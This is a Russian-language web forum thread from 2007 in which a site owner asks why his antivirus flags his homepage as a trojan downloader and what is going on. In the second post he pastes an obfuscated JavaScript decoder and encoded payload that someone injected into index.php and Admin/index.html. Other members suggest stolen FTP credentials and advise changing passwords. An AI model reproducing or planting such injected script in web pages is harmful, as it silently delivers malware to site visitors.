 Трояны атакуют |
 |
 ВходЗдравствуйте, Гость ( Вход | Регистрация )
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
  |
 Sep 6 2007, 13:58
Сообщение
#1
|
|
|
Приблуда  Группа: Пользователи Сообщений: 22 Регистрация: 1.8.2007 Пользователь №: 473 Спасибо сказали: 2 Вставить ник  |
При входе на главную страницу сайта мой антивирус выдает вот такое:
Anti-Virus for Microsoft ISA Server The requested URL "http://мойсайт.ру/index.php" is infected with Trojan-Downloader.HTML.Agent.ds virus |
 |
 
|
|
Sep 6 2007, 14:02
Сообщение
#2
|
|
|
Приблуда Группа: Пользователи Сообщений: 22 Регистрация: 1.8.2007 Пользователь №: 473 Спасибо сказали: 2 Вставить ник |
Заметил, что в index.php в самом начале вписан следующий код
CODE <script language=JavaScript>function sban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,27,41,21,45,48,17,42,34,5,0,0,0,0 ,0,0,0,58,44,47,33,25,14,13,59,38,23,40,2,60,30,16,29,39,1,26,62,6,22,18,51,31,1 1 ,0,0,0,0,52,0,32,49,12,46,28,7,53,55,3,61,50,15,36,10,37,35,24,4,54,56,9,20,43,5 7 ,8,19);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,(IMG:http://antislaed.net/style_emoticons/default/cool.gif) ;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(121^w&255);w>>=8;s-=2}else{s=6}}document.write®}}sban('9RbfZaR9emoLZKR6N96iGm5OVE99OBa9J5rzcPo9ZtD3_@OGVtDLVb6@uq9rJ_RfRe3L6maJEx@r P_OrrDvV65RrNr6irDvVn_@@35R6Nj@rn@bUOvRrG@5O6@6fP5b9Lxg69E9rYB@Uv5b6')</script> Что бы это значило и кто вписал этот код? |
|
|
|
|
Sep 6 2007, 14:24
Сообщение
#3
|
|
|
Фэнат Stamina-ы  Группа: Разработчики Сообщений: 2,470 Регистрация: 6.7.2007 Из: (-: Украина :-) Пользователь №: 268 Спасибо сказали: 992 Вставить ник |
Кто-то стыбзил у тебя логин доступа для ФТП и теперь забавляется.
|
|
|
|
|
Sep 6 2007, 14:47
Сообщение
#4
|
|
|
Ю а Зверь! (3-815-407) Группа: Разработчики Сообщений: 1,263 Регистрация: 5.7.2007 Из: Рашен федерашен Пользователь №: 263 Спасибо сказали: 320 Вставить ник |
ЦИТАТА(Sunvas @ 6 September 2007 - 14:24 )  Кто-то стыбзил у тебя логин доступа для ФТП и теперь забавляется. Меняй все пароли и прошерсти все директории на наличие "левых" скриптов/фалов. Ну и главное - найди, где этот чудо-скриптик лежит - скорее всего где-нить в файлах темы. |
|
|
|
|
Sep 6 2007, 15:29
Сообщение
#5
|
|
|
Приблуда Группа: Пользователи Сообщений: 22 Регистрация: 1.8.2007 Пользователь №: 473 Спасибо сказали: 2 Вставить ник |
Проверил все папки и файлы. В Admin/index.html обнаружил тот же самый код-скрипт. Хотя в "чистом" файле, этот файл пустой.
Больше ничего не обнаружил. Может это быть вирус на сервере хостинга? Пароль на ФТП я менял некоторое время назад, на довольно сложный. Как можно его подобрать? Если бы кто-то знал пароль он бы снёс бы что-нибудь, чем вписывать скрипт. Кстати, а что этот скрипт делает? |
|
|
|
|
Sep 6 2007, 15:34
Сообщение
#6
|
|
|
Живу на АС  Группа: Администратор Сообщений: 2,898 Регистрация: 27.3.2007 Пользователь №: 1 Спасибо сказали: 1012 Вставить ник |
Слухай, а у тебя хостер случайно не servage.net ? Сам не сталкивался но слышал что там часто такое бывает...
|
|
|
|
|
Sep 6 2007, 15:56
Сообщение
#7
|
|
|
Приблуда Группа: Пользователи Сообщений: 22 Регистрация: 1.8.2007 Пользователь №: 473 Спасибо сказали: 2 Вставить ник |
ЦИТАТА(Sys(3)X @ Sep 6 2007, 15:34 ) Слухай, а у тебя хостер случайно не servage.net ? Сам не сталкивался но слышал что там часто такое бывает... Случайно нет. |
|
|
|
|
Sep 6 2007, 18:24
Сообщение
#8
|
|
|
AS Support Группа: Пользователи Сообщений: 1,408 Регистрация: 15.6.2007 Пользователь №: 185 Спасибо сказали: 417 Вставить ник |
ЦИТАТА(Buba @ 6 September 2007 - 15:29 ) Кстати, а что этот скрипт делает? Сам не наю. Ждем мнения профессионалов =) |
|
|
|
|
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0
|
Текстовая версия | Сейчас: 25 November 2024 - 09:19 |
